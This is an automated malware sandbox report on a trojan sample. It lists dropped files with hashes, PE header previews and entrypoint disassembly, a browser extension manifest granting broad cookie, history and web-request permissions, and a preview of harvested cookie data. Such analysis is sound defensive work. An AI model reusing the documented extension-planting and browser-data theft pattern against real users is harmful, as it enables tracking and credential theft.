Joe Sandbox View:	Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: tyxCV1ouryr7.exe, Detection: malicious, Browse Filename: aOn5CfTiwS.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73160
Entropy (8bit):	6.49500452335621
Encrypted:	false
SSDEEP:	1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5:	F0372FF8A6148498B19E04203DBB9E69
SHA1:	27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256:	298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512:	65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...\|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\atl71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	6.46929682960805
Encrypted:	false
SSDEEP:	1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5:	79CB6457C81ADA9EB7F2087CE799AAA7
SHA1:	322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256:	A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
SHA-512:	ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............\|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92080
Entropy (8bit):	5.923150781730819
Encrypted:	false
SSDEEP:	1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
MD5:	DBA9A19752B52943A0850A7E19AC600A
SHA1:	3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
SHA-256:	69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
SHA-512:	A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.\|...\|...\|...t...\|...p...\|...p...\|...p...\|...p...\|..~t...\|..._...\|...t...\|..~t...\|...\|..6\|..sk...\|..sk...\|...w...\|..sk...\|..Rich.\|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\download_user.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3512776
Entropy (8bit):	6.514740710935125
Encrypted:	false
SSDEEP:	49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
MD5:	1A87FF238DF9EA26E76B56F34E18402C
SHA1:	2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
SHA-256:	ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
SHA-512:	B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
Malicious:	false
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	503808
Entropy (8bit):	6.4043708480235715
Encrypted:	false
SSDEEP:	12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
MD5:	A94DC60A90EFD7A35C36D971E3EE7470
SHA1:	F936F612BC779E4BA067F77514B68C329180A380
SHA-256:	6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
SHA-512:	FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<\|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.56488891304105
Encrypted:	false
SSDEEP:	6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
MD5:	CA2F560921B7B8BE1CF555A5A18D54C3
SHA1:	432DBCF54B6F1142058B413A9D52668A2BDE011D
SHA-256:	C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
SHA-512:	23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6\|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\zlib1.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	6.753320551944624
Encrypted:	false
SSDEEP:	1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
MD5:	89F6488524EAA3E5A66C5F34F3B92405
SHA1:	330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
SHA-256:	BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
SHA-512:	CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ecv743B.tmp Download File
Process:	C:\Users\user\AppData\Roaming\1618257864703.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xceb20a5a, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	0.872567430864403
Encrypted:	false
SSDEEP:	12288:e74014aRkBt/6hghBohNhfrg7OSj2sjR6BTG75DNU7R2UpMbgVpJXky/7xLDhXh1:kJ+wPM7f2sbMjRDhOnX34fVccgeTaNX
MD5:	B12C2D6FDBF5C909F5ED29EBACA2B2A8
SHA1:	4D3F404A0058567333053D6BF394E2147BA6008A
SHA-256:	EF1756636E21F05C140D30FB22F9221185CC2E93D1433E1CD2E767A2D2419501
SHA-512:	CBA8AC58FD0CA7EDED87B18155202591F5BDF1FE819EC222FE0791F18FAEA463A2864CA09E6A198EF54FE5A3F9B57EA8C93345B2CC4BD2DF8EB9E4E4BD2F91DB
Malicious:	false
Preview:	..Z... .......Z........Ef..4...w.............................."....x{......x..h..............................W.4...w..............................................................................................[............B.................................................................................................................. ............y........................................................................................................................................................................................................................................w......y.s................w~.`'....x..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gdiview.msi Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File Type:	;1033
Category:	modified
Size (bytes):	237056
Entropy (8bit):	6.262405449836627
Encrypted:	false
SSDEEP:	3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
MD5:	7CC103F6FD70C6F3A2D2B9FCA0438182
SHA1:	699BD8924A27516B405EA9A686604B53B4E23372
SHA-256:	DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
SHA-512:	92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
Malicious:	false
Preview:	......................>.......................................................\|.......\|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...

C:\Users\user\AppData\Local\Temp\xldl.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	1397922
Entropy (8bit):	7.999863097294012
Encrypted:	true
SSDEEP:	24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
MD5:	18C413810B2AC24D83CD1CDCAF49E5E1
SHA1:	ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
SHA-256:	9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
SHA-512:	FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
Malicious:	false
Preview:	7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.\|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~\|J^.YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....\|..n1...Y.i4\.ZN..V....U)...\|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.

C:\Users\user\AppData\Local\Temp\xldl.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293320
Entropy (8bit):	6.347427939821131
Encrypted:	false
SSDEEP:	6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
MD5:	208662418974BCA6FAAB5C0CA6F7DEBF
SHA1:	DB216FC36AB02E0B08BF343539793C96BA393CF1
SHA-256:	A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
SHA-512:	8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Web Data1618257874860 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\crx.7z Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	36105
Entropy (8bit):	7.994610469125073
Encrypted:	true
SSDEEP:	768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
MD5:	DAFDD7237BA10D0C91295CD1C15749B2
SHA1:	45D55EE145BC71921271BA5493F13D3428589D4D
SHA-256:	B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
SHA-512:	50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
Malicious:	false
Preview:	7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..\|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^\|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...\|....3...X.E.N.I7...]".50.6...or

C:\Users\user\AppData\Local\crx.json Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1981
Entropy (8bit):	5.365969892012237
Encrypted:	false
SSDEEP:	48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
MD5:	B5CEED4A6FA3F501787DE10B4CB02EEE
SHA1:	F09C0A8CA18D825D6CE6F192090EBD0659C7321B
SHA-256:	749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
SHA-512:	02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
Malicious:	false
Preview:	{"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false

C:\Users\user\AppData\Localwebdata1618257874860 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1618257864703.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103632
Entropy (8bit):	6.404475911013687
Encrypted:	false
SSDEEP:	1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
MD5:	EF6F72358CB02551CAEBE720FBC55F95
SHA1:	B5EE276E8D479C270ECEB497606BD44EE09FF4B8
SHA-256:	6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
SHA-512:	EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1618257864703.txt Download File
Process:	C:\Users\user\AppData\Roaming\1618257864703.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	24468
Entropy (8bit):	3.7166807617924777
Encrypted:	false
SSDEEP:	192:b3r3Ii3M35gYs3b370v323b3n3jLI67T3q5wW/j+es8JlkSWIF:bb/cJgYsLL0vmL3zLIUqmB8JlkSZF
MD5:	B1271FAFAB78B64C4A452B45C8EC36B8
SHA1:	7B6AB613FA6A9EF51D604611818C5F0EAC43CC74
SHA-256:	91FF08B58EC792C626C95667EC233C51B678C2848C601E1B3F86FD458F62E4A2
SHA-512:	AFE65F52D6D2B270D9EFC11137515D8916E6CFBE0BBC74175D3C7F86E38951112074E537E28C17565C33C0C955466DF374531EF66EA0DF8D2B49CEF10E6F3960
Malicious:	false
Preview:	..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.1. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".m.a.r.k.e.t.P.r.e.f.".,.....".V.a.l.u.e.".:.".d.e.-.c.h.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".Y.e.s.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".2.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.0.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.0. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".P.r.e.f.e.r.e.n.c.e.s.M.s.n.".,.....".V.a.l.u.e.".:.".e.y.J.F.e.H.B.p.c.n.l.U.a.W.1.l.I.j.o.2.M.z.c.y.O.D.g.1.O.T.M.z.N.j.g.z.N.j.I.z.M.D.U.s.I.l.Z.l.c.n.N.p.b.2.4.i.O.j.F.9.0.".,...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.866429705903183
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File size:	4255416
MD5:	29389832e538957dc769cf709f80144a
SHA1:	72f5ca06d840acbc9b49e4096e341c0dbaac891e
SHA256:	d6d2e00343a3cad48cc2f4799ce87d27acc3ce154aed286c07f226de2e9c4035
SHA512:	5f787359fbc37d8bed92da38e80106cc257c2339488ca956759b33024aa61194bb87faa8db841ded486d5bba253ce44342dd206cf93a9751de95784f5ee79f05
SSDEEP:	98304:EoT9sIWSFT79YBDTzRHjEREGL1d2YuVNR:RCIW6790vlHjEREGLK3bR
File Content Preview:	MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V...........................

File Icon


Icon Hash:	b595139bec4252a9

Static PE Info

General
Entrypoint:	0x403bc3
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x56250B1B [Mon Oct 19 15:24:11 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3a057d8e2436bad9e0ae8c20a8d4d334

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 00403BC3h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C647Dh
mov esi, edi
mov edx, edi
mov edx, dword ptr [edi]
mov eax, dword ptr [esi]
push eax
call edx
popad
push 00000003h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C6482h
mov eax, ebp
mov ebx, ecx
mov eax, ecx
mov eax, dword ptr [esi]
idiv eax
mov esp, ecx
add ebx, eax
mov esp, esi
popad
mov eax, 00403F45h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
